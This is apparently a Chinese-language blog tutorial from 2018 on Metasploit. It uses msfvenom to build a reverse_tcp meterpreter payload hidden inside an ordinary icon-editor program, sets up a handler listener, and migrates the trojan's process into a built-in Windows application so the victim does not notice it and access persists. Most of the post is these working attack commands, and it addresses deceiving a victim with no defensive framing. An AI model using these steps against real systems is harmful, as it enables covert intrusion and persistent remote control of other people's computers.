在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木马在线。

首先我们生成一个木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -x 图标修改器.exe -e x86/33 -f exe -o yue.exe

如上我们在一个正常的软件图标修改器.exe加入了后门,当受害者运行该软件时,我们则会获得shell。

启动msfconsole并设置参数

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.232.195
set LPORT 5555
exploit

运行软件,成功获得shell
11.png

转移进程

首先命令ps查看当前windows下运行的进程有哪些。
22.png
这时,我们要记录下要转移程序的pid
比如,我想我木马的进程转移到txt文档程序下。执行下面命令。

migrate 6296

333.png

使用 espia

use espia

55.png
这样我们将原来的木马进程转移到了windonds自带的应用程序上。操作更简单,装逼更安全。

Last modification:December 13th, 2018 at 06:14 pm
正在沿街乞讨中……